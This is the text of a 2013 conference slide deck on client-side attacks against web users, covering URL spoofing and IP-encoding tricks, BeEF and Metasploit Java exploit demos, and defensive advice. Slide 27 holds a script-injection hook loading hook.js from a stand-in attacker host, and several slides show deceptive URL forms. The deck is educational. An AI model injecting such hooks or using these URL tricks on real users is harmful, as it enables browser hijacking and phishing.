This presentation was prepared specially for IT Weekend Lviv, October 2013 and cover Client Side Attacks against web users.

1. Welcome to the world
of
HACKING
by Nazar Tymoshyk,
R&D team,
SoftServe
& Bohdan Serednyskyj, R&D team,

2. What this topic is about?

3. Як це бачать друзі
Що думає мама
Як це бачить влада
Як уявляю собі це я
Як сприймає суспільство
А що є насправді

4. This is more educational topic,
not motivational

5. Amateurs hacks - systems,
Professionals hacks PEOPLE
Client Side Attacks

7. About me

8. Feel free to ask me anything :)

9. Best SoftServe Team –
R&D

10. Security
Team
Nazar
Tymoshyk
CEH, HP FSTS, CIW
WSS, Cisco SS, ZSS,
CLE, DCTS,
DCATS,NAI,CLP,NLTS,
CNA,NCLA,MCTS
Bohdan
Serednytsk
yi
CEH, MSTC Security,
ZSS

11. Certifications
Identity & Security
Ph.D in Security
SoftServe experts are certified
in HP Fortify Security Testing
solution

12. Time for fun. Just relax

13. Target – web users

14. Everybody knows that Government is spying us

15. Every day we are getting suspicious
emails

16. And online promotions
Yes!!! Just click link belo

17. Quick Quiz
1. Will this URL work in IE?
http:example.com
2. What page will be opened in Firefox browser after entering this
URL?
http://example.com@coredump.cx/
Answers
1. Yes. IE and most browsers parse “” as “/” for usability reasons.
2. In Firefox, that URL will take the user to coredump.cx, because
example.com will be interpreted as a valid value for the login
field. In almost all other browsers, “” will be interpreted as a
path delimiter, and the user will land on example.com instead.

18. Now try it by yourself and
answer what you get?!

19. Tricky URLs
For all browsers
http://example.com&gibberish=1234@16777216
1/
And http://example.com@coredump.cx/
is http://example.com/ for all…

20. This is it!
For all browsers
http://example.com&gibberish=1234@16777216
1/
is http://10.0.0.1/
And http://example.com@coredump.cx/
is http://example.com/ for all…
…but for Firefox it’s
http://coredump.cx/

21. Cheaters
http://example.com/.wholesomedomain.com/
This only looks like a real Slash.
Read: Evgeniy Gabrilovich and Alex Gontmakher “The Homograph Attack”

22. Server addresses
• http://127.0.0.1/
This is a canonical representation of an IPv4
address.
• http://0x7f.1/
This is a representation of the same address that
uses a hexadecimal number to represent the first
octet and concatenates all the remaining octets into
a single decimal value.
• http://017700000001/
The same address is denoted using a 0-prefixed
octal value, with all octets concatenated into a single

23. Now attention

24. Recommended Book

25. DEMO I

26. BeeF – Browser exploitation framework

27. Our victim site
http://192.168.241.240:8882
<script
src=http://attackersite/hook.js></script>

28. Now about Java

29. Everybody likes Java

30. But
there is a small problem
in 2013

32. Java exploits in Metasploit 4
Status - Excelle

33. JVM vulnerabilities

34. DEMO II

35. Social Engineering TOolkit

36. Consequences
• Stolen Developer Cloud access Certificates
• Malware and Spyware on PC and mobile
• Key loggers
• Money Lost – Paypal, webmoney, etc.
• Email – recovery and steal accounts
• SHAME!

37. Recommendations
• Up to date JAVA and all other software
• Antivirus – Kasper rocks!
• Encrypted keys to infrastructure
• 2 factor authentication everywhere (email first)
• Verify yourself and your browser on …
• Attention

38. OWASP Secure Coding Guide

39. Apache Shiro

40. OWASP WebGoat, DVWA Train yourself in Security

41. Hope you like it!

42. Now ask!
Email: root.nt@gmail.com
Skype: root_nt
Thank You!
Copyright © 2013 SoftServe, Inc.